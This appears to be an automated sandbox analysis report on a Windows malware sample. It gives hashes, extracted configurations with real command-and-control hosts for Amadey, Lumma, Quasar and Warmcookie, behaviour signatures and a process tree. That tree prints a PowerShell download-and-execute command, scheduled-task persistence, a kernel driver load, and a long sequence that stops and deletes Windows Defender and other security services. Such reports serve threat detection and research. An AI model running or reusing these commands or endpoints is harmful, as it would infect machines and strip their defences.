Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/04/2025, 17:36

General

  • Target

    2025-04-01_13ac84957cce7c22118dac95731264ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    13ac84957cce7c22118dac95731264ef

  • SHA1

    9e467a6ca8b367e576c3d8a66ea0daac4c4335b4

  • SHA256

    c4cc70527adb8bcb862c7d2a97466a6c5364206a76b140b0197fcb00304b87f5

  • SHA512

    6312fa0ccfe31d94f970f1263db0a94e176c8470c256a225cc5052c29f62e9b19803bb1bb228e94579be79f95a8addc9a23ce86470bc27e04a8d7b9193555478

  • SSDEEP

    24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8a0qu:6TvC/MTQYxsWR7a0q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://dmetalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://-targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://targett.top/dsANGt

https://hadvennture.top/GKsiio

https://anavstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

Extracted

Family

quasar

Version

1.4.1

Botnet

CyberPunk

C2

dakar.wohowoho.com:443

dakar.wohowoho.com:80

206.206.76.75:443

206.206.76.75:80

62.60.226.176:80

62.60.226.176:443

Mutex

5e809a5b-bb22-41b6-af20-5285e99040d3

Attributes
  • encryption_key

    A98DEEE2D49BDF1C5183B3079E9B28E281586F6F

  • install_name

    chrome.exe

  • log_directory

    Logs

  • reconnect_delay

    30000

  • startup_key

    GoogleChrome

  • subdirectory

    Google\Chrome

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes
  • install_dir

    52907c9546

  • install_file

    tgvazx.exe

  • strings_key

    cc9d94f7503394295f4824f8cfd50608

  • url_paths

    /Di0Her478/index.php

rc4.plain

Extracted

Family

warmcookie

C2

192.36.57.50

Attributes
  • mutex

    62580f79-f0e4-46c9-9fe6-041328dce2b7

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Warmcookie family
  • Warmcookie, Badspace

    Warmcookie aka Badspace is a backdoor written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 23 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 53 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 50 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 22 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 37 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 49 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2528
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:6044
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:5656
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:7000
    • C:\Users\Admin\AppData\Local\Temp\2025-04-01_13ac84957cce7c22118dac95731264ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-01_13ac84957cce7c22118dac95731264ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:5960
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn oio4gmaRVSz /tr "mshta C:\Users\Admin\AppData\Local\Temp\8MW593YCF.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:6044
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn oio4gmaRVSz /tr "mshta C:\Users\Admin\AppData\Local\Temp\8MW593YCF.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1472
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\8MW593YCF.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:6088
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RP1EAB3C6HYGL92EWTAX25TPCXPUV32K.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4400
          • C:\Users\Admin\AppData\Local\TempRP1EAB3C6HYGL92EWTAX25TPCXPUV32K.EXE
            "C:\Users\Admin\AppData\Local\TempRP1EAB3C6HYGL92EWTAX25TPCXPUV32K.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2240
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1736
              • C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe
                "C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2404
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1992
              • C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe
                "C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4548
                • C:\Users\Admin\Abspawnhlp.exe
                  "C:\Users\Admin\Abspawnhlp.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4664
                  • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    PID:6096
                    • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      9⤵
                      • Downloads MZ/PE file
                      • Checks computer location settings
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Modifies registry class
                      PID:5372
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1504
                      • C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"
                        10⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:4060
                        • C:\Users\Admin\Abspawnhlp.exe
                          "C:\Users\Admin\Abspawnhlp.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:5712
                          • C:\Users\Admin\Abspawnhlp.exe
                            C:\Users\Admin\Abspawnhlp.exe
                            12⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:1524
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:5892
                      • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"
                        10⤵
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        PID:5084
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:4560
                      • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                        "C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1768
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 80
                          11⤵
                          • Program crash
                          PID:1040
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:5468
                      • C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"
                        10⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:2364
                      • C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"
                        10⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:5268
                        • C:\Users\Admin\CamMenuMaker.exe
                          "C:\Users\Admin\CamMenuMaker.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: MapViewOfSection
                          PID:6044
                          • C:\Users\Admin\CamMenuMaker.exe
                            C:\Users\Admin\CamMenuMaker.exe
                            12⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:2376
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==
                              13⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              PID:12948
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            12⤵
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:6632
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd.exe
                      9⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4028
              • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
                "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1772
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4476
              • C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe
                "C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1912
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4460
                • C:\ProgramData\Google\Chrome\chrome.exe
                  "C:\ProgramData\Google\Chrome\chrome.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1072
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                    8⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:5356
              • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
                "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4968
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1708
              • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
                "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1876
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:6104
              • C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe
                "C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2148
                • C:\Users\Admin\AppData\Local\Temp\261.exe
                  "C:\Users\Admin\AppData\Local\Temp\261.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:764
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3042.tmp\3043.tmp\3044.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                    8⤵
                      PID:4656
                      • C:\Users\Admin\AppData\Local\Temp\261.exe
                        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:660
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3217.tmp\3218.tmp\3219.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                          10⤵
                          • Drops file in Program Files directory
                          PID:1848
                          • C:\Windows\system32\sc.exe
                            sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                            11⤵
                            • Launches sc.exe
                            PID:664
                          • C:\Windows\system32\sc.exe
                            sc start ddrver
                            11⤵
                            • Launches sc.exe
                            PID:748
                          • C:\Windows\system32\timeout.exe
                            timeout /t 1
                            11⤵
                            • Delays execution with timeout.exe
                            PID:3796
                          • C:\Windows\system32\sc.exe
                            sc stop ddrver
                            11⤵
                            • Launches sc.exe
                            PID:6100
                          • C:\Windows\system32\sc.exe
                            sc start ddrver
                            11⤵
                            • Launches sc.exe
                            PID:4128
                          • C:\Windows\system32\takeown.exe
                            takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                            11⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:3708
                          • C:\Windows\system32\icacls.exe
                            icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                            11⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:4948
                          • C:\Windows\system32\sc.exe
                            sc stop "WinDefend"
                            11⤵
                            • Launches sc.exe
                            PID:6032
                          • C:\Windows\system32\sc.exe
                            sc delete "WinDefend"
                            11⤵
                            • Launches sc.exe
                            PID:6028
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                            11⤵
                              PID:2932
                            • C:\Windows\system32\sc.exe
                              sc stop "MDCoreSvc"
                              11⤵
                              • Launches sc.exe
                              PID:1908
                            • C:\Windows\system32\sc.exe
                              sc delete "MDCoreSvc"
                              11⤵
                              • Launches sc.exe
                              PID:1588
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                              11⤵
                                PID:5304
                              • C:\Windows\system32\sc.exe
                                sc stop "WdNisSvc"
                                11⤵
                                • Launches sc.exe
                                PID:1680
                              • C:\Windows\system32\sc.exe
                                sc delete "WdNisSvc"
                                11⤵
                                • Launches sc.exe
                                PID:4868
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                11⤵
                                  PID:5144
                                • C:\Windows\system32\sc.exe
                                  sc stop "Sense"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2824
                                • C:\Windows\system32\sc.exe
                                  sc delete "Sense"
                                  11⤵
                                  • Launches sc.exe
                                  PID:3540
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                  11⤵
                                    PID:6068
                                  • C:\Windows\system32\sc.exe
                                    sc stop "wscsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:4412
                                  • C:\Windows\system32\sc.exe
                                    sc delete "wscsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:5292
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                    11⤵
                                    • Modifies security service
                                    PID:2736
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:4444
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:4776
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                    11⤵
                                      PID:4936
                                    • C:\Windows\system32\sc.exe
                                      sc stop "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4632
                                    • C:\Windows\system32\sc.exe
                                      sc delete "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:5356
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                      11⤵
                                        PID:1928
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:3100
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:1700
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                        11⤵
                                          PID:3320
                                        • C:\Windows\system32\sc.exe
                                          sc stop "webthreatdefusersvc"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1052
                                        • C:\Windows\system32\sc.exe
                                          sc delete "webthreatdefusersvc"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1840
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                          11⤵
                                            PID:2732
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdNisDrv"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2612
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdNisDrv"
                                            11⤵
                                            • Launches sc.exe
                                            PID:1560
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                            11⤵
                                              PID:2136
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdBoot"
                                              11⤵
                                              • Launches sc.exe
                                              PID:3872
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdBoot"
                                              11⤵
                                              • Launches sc.exe
                                              PID:4120
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                              11⤵
                                                PID:2924
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdFilter"
                                                11⤵
                                                • Launches sc.exe
                                                PID:4268
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdFilter"
                                                11⤵
                                                • Launches sc.exe
                                                PID:5892
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                11⤵
                                                  PID:4056
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "SgrmAgent"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:4724
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "SgrmAgent"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2944
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                  11⤵
                                                    PID:1708
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecWfp"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:5844
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecWfp"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:5604
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                    11⤵
                                                      PID:5616
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecFlt"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:5996
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecFlt"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:1084
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                      11⤵
                                                        PID:6000
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecCore"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:3516
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecCore"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:5704
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                        11⤵
